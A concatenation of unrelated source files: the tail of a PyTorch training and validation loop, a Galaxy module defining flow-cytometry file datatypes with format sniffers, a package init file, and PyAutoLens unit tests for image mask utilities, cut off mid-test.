pred = outputs.max(2)[1].cpu().numpy()
pred_label = sig_arg[:,-1,:]
pred_label[pred==0] = (sig_arg[:,-2,:])[pred==0]
score_calclater.add_result(open_channels.cpu().numpy(), pred_label, group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Train Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def tester_v2(net, loader, criterion, classification=True, score_use_group=False):
net.eval()
total_loss = 0
score_calclater = MacroF1ScoreCalculater()
with torch.no_grad():
#for batch_idx, (signals, group, open_channels, trams_mtrxs) in enumerate(tqdm(loader)):
for batch_idx, data in enumerate(tqdm(loader)):
if len(data) == 3:
signals, group, open_channels = data[0].cuda(), data[1].cuda(), data[2].cuda()
else:
signals, group, open_channels, trams_mtrxs = data[0].cuda(), data[1].cuda(), data[2].cuda(), data[3].cuda()
#
cor_label = torch.eq(torch.argmax(signals, dim=1), open_channels).long()
if len(data) == 3:
outputs = net(signals)
else:
outputs = net(signals, trams_mtrxs)
if criterion is not None:
loss = criterion(outputs, cor_label)
# loss
total_loss += loss.item()
else:
total_loss += 0
# score
sig_arg = np.argsort(signals.cpu().numpy(), axis=1)
pred = outputs.max(2)[1].cpu().numpy()
pred_label = sig_arg[:,-1,:]
pred_label[pred==0] = (sig_arg[:,-2,:])[pred==0]
score_calclater.add_result(open_channels.cpu().numpy(), pred_label, group.cpu().numpy())
# loss
total_loss = total_loss / (batch_idx + 1)
# score
score = score_calclater.calc_score(use_group=score_use_group)
score_calclater.calc_score_region_wise(num_region=10)
print('Valid Loss: %.4f | Score: %.4f' % (total_loss, score))
return total_loss, score
def train_model_v2(net, tr_loader, vl_loader, use_label,
optimizer, tr_criterion, vl_criterion,
grad_accum_steps, start_epoch, epochs,
warmup_epoch, step_scheduler, filename_head='',
classification=True):
# warmup_scheduler
if start_epoch < warmup_epoch:
warmup_scheduler = WarmUpLR(optimizer, len(tr_loader) * warmup_epoch)
else:
warmup_scheduler = None
# train
loglist = []
for epoch in range(start_epoch, epochs):
if epoch > warmup_epoch - 1:
warm_sch = None
step_scheduler.step()
else:
warm_sch = warmup_scheduler
print('\nepoch ', epoch)
for param_group in optimizer.param_groups:
print('lr ', param_group['lr'])
now_lr = param_group['lr']
score_use_group = (epoch == epochs - 1)
tr_log = trainer_v2(net, tr_loader, tr_criterion, optimizer, grad_accum_steps, warm_sch, use_label, classification, score_use_group)
vl_log = tester_v2(net, vl_loader, vl_criterion, classification, score_use_group)
# save checkpoint
save_checkpoint(epoch, net, optimizer, step_scheduler, filename_head + 'checkpoint')
# save log
loglist.append([epoch] + [now_lr] + list(tr_log) + list(vl_log))
        columns = ['epoch', 'lr', 'tr_loss', 'tr_score', 'vl_loss', 'vl_score']
        save_log(loglist, columns, filename_head + 'training_log.csv')
return net

# -*- coding: utf-8 -*-
# lib/galaxy/datatypes/flow.py (emily101-gif/immport-galaxy, CC-BY-3.0 license)
######################################################################
# Copyright (c) 2016 Northrop Grumman.
# All rights reserved.
######################################################################
"""
Flow analysis datatypes.
"""
import gzip
import json
import logging
import os
import sys
import re
import subprocess
import tempfile
from galaxy.datatypes.binary import Binary
from galaxy.datatypes.tabular import Tabular
from galaxy.datatypes.data import get_file_peek, Text
from galaxy.datatypes.metadata import MetadataElement
from galaxy.util import nice_size, string_as_bool
from . import data
log = logging.getLogger(__name__)
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
class FCS(Binary):
"""Class describing an FCS binary file"""
file_ext = "fcs"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary FCS file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
        except Exception:
            return "Binary FCS file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
        Check if the file is in FCS format. Should read FCS2.0, FCS3.0
        and FCS3.1.
        For this to work, checkFCS.R must be installed via bioconda:
        conda install ig-checkflowtypes
"""
try:
rscript = 'checkFCS.R'
fcs_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(fcs_check)):
return True
else:
return False
        except Exception:
            return False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format("fcs", "fcs", FCS)
class FlowFrame(Binary):
"""R Object containing flowFrame saved with saveRDS"""
file_ext = 'flowframe'
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary RDS flowFrame file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
        except Exception:
return "Binary RDS flowFrame (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
        Check if the file is a flowFrame R object.
        For this to work, checkFlowframe.R must be installed via bioconda:
        conda install ig-checkflowtypes
"""
try:
rscript = 'checkFlowframe.R'
ff_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(ff_check)):
return True
else:
return False
        except Exception:
            return False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format('flowframe', 'flowframe', FlowFrame)
class FlowSOM(Binary):
"""R Object containing fSOM saved with saveRDS"""
file_ext = 'fsom'
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary RDS fsom file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
        except Exception:
return "Binary RDS fsom (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
        Check if the file is a FlowSOM R object.
        For this to work, checkFlowSOM.R must be installed via bioconda:
        conda install ig-checkflowtypes
"""
try:
rscript = 'checkFlowSOM.R'
fcs_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(fcs_check)):
return True
else:
return False
        except:
            return False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format('fsom', 'fsom', FlowSOM)
class FlowSet( Binary ):
"""R Object containing flowSet saved with saveRDS"""
file_ext = 'flowset'
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Binary RDS flowSet file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Binary RDS flowSet (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""
Checking if the file is a flowSet R object.
For this to work, need to have install checkFlowSet.R via bioconda
conda install ig-checkflowtypes
"""
try:
rscript = 'checkFlowSet.R'
fcs_check = subprocess.check_output([rscript, filename])
if re.search('TRUE', str(fcs_check)):
return True
else:
return False
        except:
            return False
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'application/octet-stream'
Binary.register_sniffable_binary_format('flowset', 'flowset', FlowSet)
class FlowText(Tabular):
"""Class describing an Flow Text file"""
file_ext = "flowtext"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Text Flow file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Text Flow file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
f.readline()
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
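The tabular sniffers in this module all depend on an `is_number` helper that is defined elsewhere in the file. A minimal sketch of what such a helper typically looks like (hypothetical; the module's own version may differ):

```python
def is_number(value):
    """Return True if `value` can be parsed as a float.

    Hypothetical sketch of the helper the sniff() methods call; the
    datatype module defines its own version elsewhere.
    """
    try:
        float(value)
        return True
    except ValueError:
        return False
```

With this definition, `is_number("2.5")` is true while `is_number("Marker1")` is false, which is exactly the per-value check the second-line scans in the sniffers rely on.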
class FlowClustered(Tabular):
"""Class describing a Flow Text that has been clustered through FLOCK"""
file_ext = "flowclr"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Text Flow Clustered file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Text Clustered file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on headers and values"""
with open(filename, "r") as f:
population = f.readline().strip().split("\t")[-1]
if population != "Population":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowMFI(Tabular):
"""Class describing a Flow MFI file"""
file_ext = "flowmfi"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "MFI Flow file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "MFI Flow file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
population = f.readline().strip().split("\t")[0]
if population != "Population":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowStats1(Tabular):
"""Class describing a Flow Stats file"""
file_ext = "flowstat1"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Stats1 file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Stats1 file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
first_header = f.readline().strip().split("\t")[0]
if first_header != "FileID":
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowStats2(Tabular):
"""Class describing a Flow Stats file"""
file_ext = "flowstat2"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Stats2 file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Stats2 file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
smp_name = f.readline().strip().split("\t")[-1]
if smp_name != "SampleName":
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowStats3(Tabular):
"""Class describing a Flow Stats file"""
file_ext = "flowstat3"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Stats3 file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Stats3 file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
last_col = f.readline().strip().split("\t")[-1]
if last_col != "Percentage_stdev":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
class FlowScore(Tabular):
"""Class describing a Flow Score file"""
file_ext = "flowscore"
def set_peek(self, dataset, is_multi_byte=False):
if not dataset.dataset.purged:
dataset.peek = "Flow Score file"
dataset.blurb = data.nice_size(dataset.get_size())
else:
dataset.peek = 'file does not exist'
dataset.blurb = 'file purged from disk'
def display_peek(self, dataset):
try:
return dataset.peek
except:
return "Flow Score file (%s)" % (data.nice_size(dataset.get_size()))
def sniff(self, filename):
"""Quick test on file formatting and values"""
with open(filename, "r") as f:
population = f.readline().strip().split("\t")[0]
if population != "Population_ID":
return False
values = f.readline().strip().split("\t")
for vals in values:
if not is_number(vals):
return False
return True
def get_mime(self):
"""Returns the mime type of the datatype"""
return 'text/tab-separated-values'
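To see how one of these header-plus-numeric checks behaves outside Galaxy, the core of `FlowMFI.sniff` can be reproduced as a standalone function and run against a throwaway tab-separated file (a sketch; `sniff_flowmfi` and the sample file are illustrative, not part of the module):

```python
import os
import tempfile


def sniff_flowmfi(filename):
    """Standalone replica of the FlowMFI.sniff logic: the first header
    cell must be 'Population' and every value on the second line must
    be numeric."""
    def is_number(value):
        try:
            float(value)
            return True
        except ValueError:
            return False

    with open(filename, "r") as f:
        if f.readline().strip().split("\t")[0] != "Population":
            return False
        return all(is_number(v) for v in f.readline().strip().split("\t"))


# Write a tiny MFI-like file and sniff it.
with tempfile.NamedTemporaryFile("w", suffix=".flowmfi", delete=False) as tmp:
    tmp.write("Population\tMarker1\tMarker2\n1\t0.52\t2.30\n")
print(sniff_flowmfi(tmp.name))  # prints: True
os.remove(tmp.name)
```

Because Galaxy tries sniffers in registration order, keeping these checks cheap (two `readline` calls, no full-file scan) matters when many datatypes are registered.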
# --- recursive_RM/__init__.py (Joshua1989/recursive_RM, MIT license) ---
from recursive_RM.common import *
from recursive_RM.decoders import *
# --- test/data/array/util/test_mask_util.py (AshKelly/PyAutoLens, MIT license) ---
import os
import numpy as np
import pytest
from autolens import exc
from autolens.data.array import mask
from autolens.data.array.util import mask_util
test_data_dir = "{}/../test_files/array/".format(os.path.dirname(os.path.realpath(__file__)))
class TestTotalPixels:
def test__total_image_pixels_from_mask(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True]])
assert mask_util.total_regular_pixels_from_mask(mask) == 5
def test__total_sub_pixels_from_mask(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True]])
assert mask_util.total_sub_pixels_from_mask_and_sub_grid_size(mask, sub_grid_size=2) == 20
def test__total_edge_pixels_from_mask(self):
mask = np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]])
assert mask_util.total_edge_pixels_from_mask(mask) == 8
class TestTotalSparsePixels:
def test__mask_full_false__full_pixelization_grid_pixels_in_mask(self):
ma = mask.Mask(array=np.array([[False, False, False],
[False, False, False],
[False, False, False]]), pixel_scale=1.0)
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 0]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 4
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [2, 1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 6
def test__mask_is_cross__only_pixelization_grid_pixels_in_mask_are_counted(self):
ma = mask.Mask(array=np.array([[True, False, True],
[False, False, False],
[True, False, True]]), pixel_scale=1.0)
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 0]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 2
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [2, 1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 4
def test__same_as_above_but_3x4_mask(self):
ma = mask.Mask(array=np.array([[True, True, False, True],
[False, False, False, False],
[True, True, False, True]]), pixel_scale=1.0)
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 0]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 2
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1], [1, 2], [1, 3], [2, 2]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 6
def test__same_as_above_but_4x3_mask(self):
ma = mask.Mask(array=np.array([[True, False, True],
[True, False, True],
[False, False, False],
[True, False, True]]), pixel_scale=1.0)
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 2
        full_pix_grid_pixel_centres = np.array([[0, 0], [0, 1], [0, 2], [1, 1], [2, 0], [2, 1], [2, 2], [3, 1]])
total_masked_pixels = mask_util.total_sparse_pixels_from_mask(mask=ma,
unmasked_sparse_grid_pixel_centres=full_pix_grid_pixel_centres)
assert total_masked_pixels == 6
class TestMaskCircular(object):
def test__3x3_mask_input_radius_small__medium__big__masks(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
radius_arcsec=0.5)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
radius_arcsec=1.3)
assert (mask == np.array([[True, False, True],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
radius_arcsec=3.0)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, False]])).all()
def test__4x3_mask_input_radius_small__medium__big__masks(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
radius_arcsec=0.5)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
radius_arcsec=1.5001)
assert (mask == np.array([[True, False, True],
[False, False, False],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
radius_arcsec=3.0)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, False],
[False, False, False]])).all()
def test__4x4_mask_input_radius_small__medium__big__masks(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
radius_arcsec=0.72)
assert (mask == np.array([[True, True, True, True],
[True, False, False, True],
[True, False, False, True],
[True, True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
radius_arcsec=1.7)
assert (mask == np.array([[True, False, False, True],
[False, False, False, False],
[False, False, False, False],
[True, False, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(4, 4), pixel_scale=1.0,
radius_arcsec=3.0)
assert (mask == np.array([[False, False, False, False],
[False, False, False, False],
[False, False, False, False],
[False, False, False, False]])).all()
def test__origin_shifts__downwards__right__diagonal(self):
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
radius_arcsec=0.5, centre=(-3, 0))
assert mask.shape == (3, 3)
assert (mask == np.array([[True, True, True],
[True, True, True],
[True, False, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
radius_arcsec=0.5, centre=(0.0, 3.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[True, True, True],
[True, True, False],
[True, True, True]])).all()
mask = mask_util.mask_circular_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=3.0,
radius_arcsec=0.5, centre=(3, 3))
assert (mask == np.array([[True, True, False],
[True, True, True],
[True, True, True]])).all()
class TestMaskAnnular(object):
def test__mask_inner_radius_zero_outer_radius_small_medium_and_large__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=1.0,
inner_radius_arcsec=0.0, outer_radius_arcsec=0.5)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 4), pixel_scale=1.0,
inner_radius_arcsec=0.81, outer_radius_arcsec=2.0)
assert (mask == np.array([[True, False, False, True],
[False, True, True, False],
[False, True, True, False],
[True, False, False, True]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=3.0)
assert (mask == np.array([[False, False, False],
[False, True, False],
[False, False, False]])).all()
def test__4x3_mask_inner_radius_small_outer_radius_medium__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 3), pixel_scale=1.0,
inner_radius_arcsec=0.51, outer_radius_arcsec=1.51)
assert (mask == np.array([[True, False, True],
[False, True, False],
[False, True, False],
[True, False, True]])).all()
def test__4x3_mask_inner_radius_medium_outer_radius_large__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 3), pixel_scale=1.0,
inner_radius_arcsec=1.51, outer_radius_arcsec=3.0)
assert (mask == np.array([[False, True, False],
[True, True, True],
[True, True, True],
[False, True, False]])).all()
def test__4x4_mask_inner_radius_medium_outer_radius_large__mask(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(4, 4), pixel_scale=1.0,
inner_radius_arcsec=1.71, outer_radius_arcsec=3.0)
assert (mask == np.array([[False, True, True, False],
[True, True, True, True],
[True, True, True, True],
[False, True, True, False]])).all()
def test__origin_shift__simple_shift_upwards__right_diagonal(self):
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=3.0,
inner_radius_arcsec=0.5,
outer_radius_arcsec=9.0, centre=(3.0, 0.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[False, True, False],
[False, False, False],
[False, False, False]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=3.0,
inner_radius_arcsec=0.5,
outer_radius_arcsec=9.0, centre=(0.0, 3.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[False, False, False],
[False, False, True],
[False, False, False]])).all()
mask = mask_util.mask_circular_annular_from_shape_pixel_scale_and_radii(shape=(3, 3), pixel_scale=3.0,
inner_radius_arcsec=0.5,
outer_radius_arcsec=9.0, centre=(-3.0, 3.0))
assert mask.shape == (3, 3)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, True]])).all()
class TestMaskAntiAnnular(object):
def test__5x5_mask_inner_radius_includes_central_pixel__outer_extended_beyond_radius(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(5, 5), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=10.0,
outer_radius_2_arcsec=20.0)
assert (mask == np.array([[True, True, True, True, True],
[True, True, True, True, True],
[True, True, False, True, True],
[True, True, True, True, True],
[True, True, True, True, True]])).all()
def test__5x5_mask_inner_radius_includes_3x3_central_pixels__outer_extended_beyond_radius(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(5, 5), pixel_scale=1.0,
inner_radius_arcsec=1.5, outer_radius_arcsec=10.0,
outer_radius_2_arcsec=20.0)
assert (mask == np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]])).all()
def test__5x5_mask_inner_radius_includes_central_pixel__outer_radius_includes_outer_pixels(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(5, 5), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=1.5,
outer_radius_2_arcsec=20.0)
assert (mask == np.array([[False, False, False, False, False],
[False, True, True, True, False],
[False, True, False, True, False],
[False, True, True, True, False],
[False, False, False, False, False]])).all()
def test__7x7_second_outer_radius_mask_works_too(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(7, 7), pixel_scale=1.0,
inner_radius_arcsec=0.5, outer_radius_arcsec=1.5,
outer_radius_2_arcsec=2.9)
assert (mask == np.array([[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, True, True, True, False, True],
[True, False, True, False, True, False, True],
[True, False, True, True, True, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True]])).all()
def test__origin_shift__diagonal_shift(self):
mask = mask_util.mask_circular_anti_annular_from_shape_pixel_scale_and_radii(shape=(7, 7), pixel_scale=3.0,
inner_radius_arcsec=1.5, outer_radius_arcsec=4.5,
outer_radius_2_arcsec=8.7, centre=(-3.0, 3.0))
assert (mask == np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, False, False],
[True, True, False, True, True, True, False],
[True, True, False, True, False, True, False],
[True, True, False, True, True, True, False],
[True, True, False, False, False, False, False]])).all()
class TestMaskElliptical(object):
def test__input_circular_params__small_medium_and_large_masks(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=0.5, axis_ratio=1.0, phi=0.0)
assert (mask == np.array([[True, True, True],
[True, False, True],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=1.0, phi=0.0)
assert (mask == np.array([[True, False, True],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=3.0, axis_ratio=1.0, phi=0.0)
assert (mask == np.array([[False, False, False],
[False, False, False],
[False, False, False]])).all()
    def test__input_elliptical_params__reduce_axis_ratio_makes_side_mask_values_false(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=0.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=180.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=360.0)
assert (mask == np.array([[True, True, True],
[False, False, False],
[True, True, True]])).all()
def test__same_as_above_but_90_degree_rotations(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=90.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.3, axis_ratio=0.1, phi=270.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True]])).all()
def test__same_as_above_but_diagonal_rotations(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1, phi=45.0)
assert (mask == np.array([[True, True, False],
[True, False, True],
[False, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1,
phi=135.0)
assert (mask == np.array([[False, True, True],
[True, False, True],
[True, True, False]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1,
phi=225.0)
assert (mask == np.array([[True, True, False],
[True, False, True],
[False, True, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5, axis_ratio=0.1,
phi=315.0)
assert (mask == np.array([[False, True, True],
[True, False, True],
[True, True, False]])).all()
def test__4x3__ellipse_is_formed(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.9, phi=90.0)
assert (mask == np.array([[True, False, True],
[False, False, False],
[False, False, False],
[True, False, True]])).all()
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(4, 3), pixel_scale=1.0,
major_axis_radius_arcsec=1.5,
axis_ratio=0.1, phi=270.0)
assert (mask == np.array([[True, False, True],
[True, False, True],
[True, False, True],
[True, False, True]])).all()
def test__3x4__ellipse_is_formed(self):
mask = mask_util.mask_elliptical_from_shape_pixel_scale_and_radius(shape=(3, 4), pixel_scale=1.0,
